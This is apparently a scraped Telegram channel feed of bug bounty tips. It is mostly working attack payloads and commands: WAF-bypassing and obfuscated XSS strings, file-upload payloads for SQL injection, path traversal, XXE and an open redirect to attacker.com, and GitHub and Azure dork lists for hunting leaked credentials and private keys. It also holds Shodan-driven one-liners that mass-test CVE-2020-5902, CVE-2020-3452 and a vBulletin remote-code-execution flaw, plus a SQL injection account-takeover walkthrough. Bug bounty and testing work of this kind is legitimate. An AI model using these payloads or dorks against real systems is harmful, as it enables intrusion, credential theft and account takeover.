CTF | Bug Bounty
🔐 Join Us for 🔐 🌐 CTF Resources 🌐 Bug Bounty Resources 🌐 CTF Challenges and More Join now: https://t.me/ctftm 👤 Owner: Team Matrix ᴅᴍᴄᴀ/ᴄᴏᴘʏʀɪɢʜᴛ ᴄʟᴀɪᴍ : @Dmcatm Admin Contact: @Teammatrixs_bot
إظهار المزيد7 967
المشتركون
-424 ساعات
-107 أيام
-1730 أيام
- المشتركون
- التغطية البريدية
- ER - نسبة المشاركة
جاري تحميل البيانات...
معدل نمو المشترك
جاري تحميل البيانات...
🚨 XSS Hunting from WaybackURLS 🔍
Payload :
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
#bugbountytips #bugbounty
🔥 7👍 4❤ 1👏 1
🖥Chaining Vulnerabilities through File Upload🖥
SLQi⏳
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal⏳
../../etc/passwd/logo.png
../../../logo.png
XSS⏳
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect ⏳
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE ⏳
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
====================
Join Our Telegram Channel
https://t.me/ctftm🔥 4
🔥 Github-Dork
Happy Hunting
🔍 api_key
🔍 app_AWS_SECRET_ACCESS_KEY
🔍 app_secret
🔍 authoriztion
🔍 Ldap
🔍 aws_access_key_id
🔍 secret
🔍 bash_history
🔍 bashrc%20password
🔍 beanstalkd
🔍 client secre
🔍 composer
🔍 config
🔍 credentials
🔍 DB_PASSWORD
🔍 dotfiles
🔍 .env file
🔍 .exs file
🔍 extension:json mongolab.com
🔍 extension:pem%20private
🔍 extension:ppk private
🔍 extension:sql mysql dump
🔍 extension:yaml mongolab.com
🔍 .mlab.com password
🔍 mysql
🔍 npmrc%20_auth
🔍 passwd
🔍 passkey
🔍 rds.amazonaws.com password
🔍 s3cfg
🔍 send_key
🔍 token
🔍 filename:.bash_history
🔍 filename:.bash_profile aws
🔍 filename:.bashrc mailchimp
🔍 filename:CCCam.cfg
🔍 filename:config irc_pass
🔍 filename:config.php dbpasswd
🔍 filename:config.json auths
🔍 filename:config.php pass
🔍 filename:config.php dbpasswd
🔍 filename:connections.xml
🔍 filename:.cshrc
🔍 filename:.git-credentials
🔍 filename:.ftpconfig
🔍 filename:.history
🔍 filename:gitlab-recovery-codes.txt
🔍 filename:.htpasswd
🔍 filename:id_rsa
🔍 filename:.netrc password
🔍 FTP
🔍 filename:wp-config.php
🔍 git-credentials
🔍 github_token
🔍 HEROKU_API_KEY language:json
🔍 HEROKU_API_KEY language:shell
🔍 GITHUB_API_TOKEN language:shell
🔍 oauth
🔍 OTP
🔍 databases password
🔍 [WFClient] Password= extension:ica
🔍 xoxa_Jenkins
🔍 security_credentials
#bugbountytips #GitHub
====================
Join Our Telegram Channel
https://t.me/ctftm
🔥 6
Photo unavailableShow in Telegram
====================
Join Our Telegram Channel
https://t.me/ctftm====================
Join Our Telegram Channel
https://t.me/ctftmNew Xss Fly Under Radar Cloudflare Bypass 🧱
Payload :
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit -Halim
====================
Join Our Telegram Channel
https://t.me/ctftm
🔥 3
Awesome One-liner Bug Bounty :
> A collection of awesome one-liner scripts especially for bug bounty.
This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.
## Definitions
This section defines specific terms or placeholders that are used throughout one-line command/scripts.
- 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by
internal.host
, domain.tld
, sub.domain.tld
, or 127.0.0.1
.
- 1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file.
- 2.1. "URL" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html
or somewhat starting with HTTP/HTTPS protocol.
- 2.2. "URLS.txt" contains criteria 2.1 with more than one in file.
- 3.1. "FILE.txt" or "FILE{N}
.txt" means the files needed to run the command/script according to its context and needs.
- 4.1. "OUT.txt" or "OUT{N}
.txt" means the file as the target storage result will be the command that is executed.
---
### Local File Inclusion
> @dwisiswant0
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
### Open-redirect
> @dwisiswant0
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
> @N3T_hunt3r
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
### XSS
> @cihanmehmet
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
> @fanimalikhack
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
> @oliverrickfors
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
### Prototype Pollution
> @R0X4R
subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
### CVE-2020-5902
> @Madrobot_
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
### CVE-2020-3452
> @vict0ni
while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
### CVE-2022-0378
> @7h3h4ckv157
cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
> @Madrobot_
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
### Find JavaScript Files
====================
Join Our Telegram Channel
https://t.me/ctftmPhoto unavailableShow in Telegram
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips❤ 2👍 1
Photo unavailableShow in Telegram
SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response
last you can login with the 1110 OTP and get access to the victim account :)
====================
Join Our Telegram Channel
https://t.me/ctftm
👍 3
Photo unavailableShow in Telegram
(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover
Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
Tips: Always play with input's => reflecting value's tags. even there is waf/cloudflare.
#bugbountytip #bugbounty
Azure OSINT Google Dork List
- site:blob.core.windows.net “keyword”
- site:"blob.core.windows.net" and intext:"CONFIDENTIAL"
- site:*.core.windows.net intext:"TLP:RED"
- site:*.core.windows.net
- site:*.core.windows.net +blob
- site:*.core.windows.net +files -web -blob
- site:*.core.windows.net -web
- site:*.core.windows.net -web -blob -files
- site:*.core.windows.net inurl:dsts.dsts
- site:*.core.windows.net inurl:"term" -web
- site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)
- intext:connectionstring blob filetype:config
- intext:accountkey windows.net filetype:xml
- intext:storageaccountkey windows.net filetype:txt
Please Share Across Your Network, Someone Might Really Be Looking For This.
#Infosec #GHDB #Azure #bugbounty
New XSS Bypass Cloudflare WAF 🧱
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E